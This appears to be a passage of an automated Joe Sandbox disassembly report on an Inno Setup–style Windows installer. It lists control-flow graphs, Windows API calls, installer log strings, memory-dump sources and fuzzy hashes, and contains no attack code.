56357->56371 56427 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56358->56427 56417 423b84 NtdllDefWindowProc_A 56359->56417 56360->56328 56361->56328 56377 423fd7 IsWindowEnabled 56361->56377 56362->56328 56418 423b84 NtdllDefWindowProc_A 56362->56418 56365 424178 12 API calls 56363->56365 56365->56328 56366 423e45 56374 423e83 56366->56374 56375 423e61 56366->56375 56367->56328 56368->56328 56421 422c4c ShowWindow PostMessageA PostQuitMessage 56368->56421 56423 423b84 NtdllDefWindowProc_A 56370->56423 56422 423bc0 15 API calls 56371->56422 56384 423a84 6 API calls 56374->56384 56426 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 56375->56426 56376 423eb6 56386 423ec8 56376->56386 56393 41ef58 6 API calls 56376->56393 56377->56328 56387 423fe5 56377->56387 56380 423ee5 56381 423efd 56380->56381 56388 41eea4 2 API calls 56380->56388 56389 423a84 6 API calls 56381->56389 56383->56328 56391 423f78 IsWindowEnabled 56383->56391 56392 423e8b PostMessageA 56384->56392 56428 423b84 NtdllDefWindowProc_A 56386->56428 56396 423fec IsWindowVisible 56387->56396 56388->56381 56389->56328 56390 423e69 PostMessageA 56390->56328 56391->56328 56395 423f86 56391->56395 56392->56328 56393->56386 56429 412310 7 API calls 56395->56429 56396->56328 56398 423ffa GetFocus 56396->56398 56399 4181e0 56398->56399 56400 42400f SetFocus 56399->56400 56430 415240 56400->56430 56404 423a94 56403->56404 56406 423b0d 56403->56406 56405 423a9a EnumWindows 56404->56405 56404->56406 56405->56406 56407 423ab6 GetWindow GetWindowLongA 56405->56407 56435 423a1c GetWindow 56405->56435 56406->56298 56408 423ad5 56407->56408 56408->56406 56409 423b01 SetWindowPos 56408->56409 56409->56406 56409->56408 56410->56308 56411->56308 56413 423b72 56412->56413 56414 423b7d 56412->56414 56413->56414 56415 408720 7 API calls 56413->56415 56414->56313 56414->56314 56415->56414 56416->56366 56417->56380 56418->56328 56419->56328 56420->56328 56421->56328 56422->56328 
56423->56328 56424->56328 56425->56349 56426->56390 56427->56376 56428->56328 56429->56328 56431 41525b SetFocus 56430->56431 56431->56328 56432->56355 56433->56349 56434->56349 56436 423a3d GetWindowLongA 56435->56436 56437 423a49 56435->56437 56436->56437 56438 4809f7 56439 480a00 56438->56439 56441 480a2b 56438->56441 56440 480a1d 56439->56440 56439->56441 56810 476c50 189 API calls 56440->56810 56442 480a6a 56441->56442 56812 47f4a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56441->56812 56443 480a8e 56442->56443 56446 480a81 56442->56446 56447 480a83 56442->56447 56452 480aca 56443->56452 56453 480aac 56443->56453 56456 47f4e8 42 API calls 56446->56456 56814 47f57c 42 API calls 56447->56814 56448 480a22 56448->56441 56811 408be0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56448->56811 56449 480a5d 56813 47f50c 42 API calls 56449->56813 56817 47f33c 24 API calls 56452->56817 56457 480ac1 56453->56457 56815 47f50c 42 API calls 56453->56815 56456->56443 56816 47f33c 24 API calls 56457->56816 56460 480ac8 56461 480ada 56460->56461 56462 480ae0 56460->56462 56463 480ade 56461->56463 56467 47f4e8 42 API calls 56461->56467 56462->56463 56465 47f4e8 42 API calls 56462->56465 56564 47c66c 56463->56564 56465->56463 56467->56463 56565 42d898 GetWindowsDirectoryA 56564->56565 56566 47c690 56565->56566 56567 403450 4 API calls 56566->56567 56568 47c69d 56567->56568 56569 42d8c4 GetSystemDirectoryA 56568->56569 56570 47c6a5 56569->56570 56571 403450 4 API calls 56570->56571 56572 47c6b2 56571->56572 56573 42d8f0 6 API calls 56572->56573 56574 47c6ba 56573->56574 56575 403450 4 API calls 56574->56575 56576 47c6c7 56575->56576 56577 47c6d0 56576->56577 56578 47c6ec 56576->56578 56849 42d208 56577->56849 56580 403400 4 API calls 56578->56580 56582 47c6ea 56580->56582 56584 47c731 56582->56584 56586 42c8cc 5 API calls 56582->56586 56583 403450 4 API calls 56583->56582 56829 47c4f4 56584->56829 56588 47c70c 56586->56588 56590 403450 4 API calls 56588->56590 
56589 403450 4 API calls 56591 47c74d 56589->56591 56592 47c719 56590->56592 56593 47c76b 56591->56593 56594 4035c0 4 API calls 56591->56594 56592->56584 56596 403450 4 API calls 56592->56596 56595 47c4f4 8 API calls 56593->56595 56594->56593 56597 47c77a 56595->56597 56596->56584 56598 403450 4 API calls 56597->56598 56599 47c787 56598->56599 56601 47c7af 56599->56601 56602 42c3fc 5 API calls 56599->56602 56600 47c816 56605 47c8de 56600->56605 56606 47c836 SHGetKnownFolderPath 56600->56606 56601->56600 56603 47c4f4 8 API calls 56601->56603 56604 47c79d 56602->56604 56607 47c7c7 56603->56607 56610 4035c0 4 API calls 56604->56610 56608 47c8e7 56605->56608 56609 47c908 56605->56609 56611 47c850 56606->56611 56612 47c88b SHGetKnownFolderPath 56606->56612 56613 403450 4 API calls 56607->56613 56610->56601 56612->56605 56810->56448 56812->56449 56813->56442 56814->56443 56815->56457 56816->56460 56817->56460 56830 42de1c RegOpenKeyExA 56829->56830 56831 47c51a 56830->56831 56832 47c540 56831->56832 56833 47c51e 56831->56833 56834 403400 4 API calls 56832->56834 56835 42dd4c 6 API calls 56833->56835 56836 47c547 56834->56836 56837 47c52a 56835->56837 56836->56589 56838 47c535 RegCloseKey 56837->56838 56839 403400 4 API calls 56837->56839 56838->56836 56839->56838 56850 4038a4 4 API calls 56849->56850 56851 42d21b 56850->56851 56852 42d232 GetEnvironmentVariableA 56851->56852 56856 42d245 56851->56856 56861 42dbd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56851->56861 56852->56851 56853 42d23e 56852->56853 56855 403400 4 API calls 56853->56855 56855->56856 56856->56583 56861->56851
Strings
• Time stamp of our file: %s, xrefs: 0047099B
• Same version. Skipping., xrefs: 00470CE5
• Uninstaller requires administrator: %s, xrefs: 0047118F
• Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
• Time stamp of existing file: %s, xrefs: 00470A2B
• Dest file exists., xrefs: 004709BB
• Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
• Version of our file: (none), xrefs: 00470AFC
• Installing into GAC, xrefs: 00471714
• @, xrefs: 004707B0
• .tmp, xrefs: 00470FB7
• Existing file has a later time stamp. Skipping., xrefs: 00470DCF
• Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
• -- File entry --, xrefs: 004706FB
• Version of existing file: (none), xrefs: 00470CFA
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
• InUn, xrefs: 0047115F
• Same time stamp. Skipping., xrefs: 00470D55
• Time stamp of existing file: (failed to read), xrefs: 00470A37
• , xrefs: 00470BCF, 00470DA0, 00470E1E
• User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
• Failed to strip read-only attribute., xrefs: 00470ED3
• Dest filename: %s, xrefs: 00470894
• Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
• Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
• Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
• Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
• Dest file is protected by Windows File Protection., xrefs: 004708ED
• Non-default bitness: 32-bit, xrefs: 004708BB
• Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
• n}, xrefs: 00470746
• Non-default bitness: 64-bit, xrefs: 004708AF
• Couldn't read time stamp. Skipping., xrefs: 00470D35
• Time stamp of our file: (failed to read), xrefs: 004709A7
• Will register the file (a type library) later., xrefs: 00471513
• Installing the file., xrefs: 00470F09
• Incrementing shared file count (32-bit)., xrefs: 004715A5
• Incrementing shared file count (64-bit)., xrefs: 0047158C
• Will register the file (a DLL/OCX) later., xrefs: 0047151F
• Existing file is a newer version. Skipping., xrefs: 00470C02
• Stripped read-only attribute., xrefs: 00470EC7
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID:
• String ID: n}$$-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
• API String ID: 0-610167065
• Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
• Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
• Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
• Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1578 42e09c-42e0ad 1579 42e0b8-42e0dd AllocateAndInitializeSid 1578->1579 1580 42e0af-42e0b3 1578->1580 1581 42e287-42e28f 1579->1581 1582 42e0e3-42e100 GetVersion 1579->1582 1580->1581 1583 42e102-42e117 GetModuleHandleA GetProcAddress 1582->1583 1584 42e119-42e11b 1582->1584 1583->1584 1585 42e142-42e15c GetCurrentThread OpenThreadToken 1584->1585 1586 42e11d-42e12b CheckTokenMembership 1584->1586 1589 42e193-42e1bb GetTokenInformation 1585->1589 1590 42e15e-42e168 GetLastError 1585->1590 1587 42e131-42e13d 1586->1587 1588 42e269-42e27f FreeSid 1586->1588 1587->1588 1591 42e1d6-42e1fa call 402648 GetTokenInformation 1589->1591 1592 42e1bd-42e1c5 GetLastError 1589->1592 1593 42e174-42e187 GetCurrentProcess OpenProcessToken 1590->1593 1594 42e16a-42e16f call 4031bc 1590->1594 1605 42e208-42e210 1591->1605 1606 42e1fc-42e206 call 4031bc * 2 1591->1606 1592->1591 1595 42e1c7-42e1d1 call 4031bc * 2 1592->1595 1593->1589 1598 42e189-42e18e call 4031bc 1593->1598 1594->1581 1595->1581 1598->1581 1607 42e212-42e213 1605->1607 1608 42e243-42e261 call 402660 CloseHandle 1605->1608 1606->1581 1611 42e215-42e228 EqualSid 1607->1611 1615 42e22a-42e237 1611->1615 1616 42e23f-42e241 1611->1616 1615->1616 1619 42e239-42e23d 1615->1619 1616->1608 1616->1611 1619->1608
APIs
• AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
• GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
• GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
• CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
• FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 2252812187-1888249752
• Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
• Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
• Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
• Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79

Control-flow Graph
APIs
• GetVersion.KERNEL32(00480B52), ref: 004502D3
• LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
• GetProcAddress.KERNEL32(6EE70000,RmStartSession), ref: 00450309
• GetProcAddress.KERNEL32(6EE70000,RmRegisterResources), ref: 0045031E
• GetProcAddress.KERNEL32(6EE70000,RmGetList), ref: 00450333
• GetProcAddress.KERNEL32(6EE70000,RmShutdown), ref: 00450348
• GetProcAddress.KERNEL32(6EE70000,RmRestart), ref: 0045035D
• GetProcAddress.KERNEL32(6EE70000,RmEndSession), ref: 00450372
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
• API String ID: 1968650500-3419246398
• Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
• Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
• Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
• Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

Control-flow Graph
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
• Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
• Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
• Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

Control-flow Graph
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                                                                        • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                                                                          • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                                                                          • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                          • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                          • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                          • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                                                                          • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                                                          • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                                                          • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                                                                          • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                                                                          • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                                                                          • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                                                                        • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021EFC20,021F1980,?,?,021F19B0,?,?,021F1A00,?), ref: 004683FD
                                                                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                                                                          • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                                                                        Strings
                                                                                                                                         Memory Dump Source
                                                                                                                                         • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         Joe Sandbox IDA Plugin
                                                                                                                                         • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                                                                        • String ID: $(Default)$STOPIMAGE$%H
                                                                                                                                        • API String ID: 3231140908-2624782221
                                                                                                                                        • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                        • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                                                                        • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                                                                        • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                                                                        • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID: unins$unins???.*
                                                                                                                                        • API String ID: 3541575487-1009660736
                                                                                                                                        • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                        • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                                                                        • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                                                                        • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                                                                        • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInstanceVersion
                                                                                                                                        • String ID: HR~
                                                                                                                                        • API String ID: 1462612201-3203950215
                                                                                                                                        • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                        • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                                                                        • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                                                                        • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                        • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                        • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                                                                        • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                                                                        • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                                                                        APIs
                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                        • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                                                                        • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                                                                        • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                        • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                                                                        • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                                                                        • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2645101109-0
                                                                                                                                        • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                        • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                                                                        • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                                                                        • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                                                                        APIs
                                                                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4255912815-0
                                                                                                                                        • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                        • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                                                                        • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                                                                        • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                                                                         Control-flow Graph

                                                                                                                                         • Function start: 0046F058 (graph image not recoverable; basic-block edge list omitted. The graph ends at the RegCloseKey call, block 46f6df-46f6f5)
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                          • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                        • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$Close
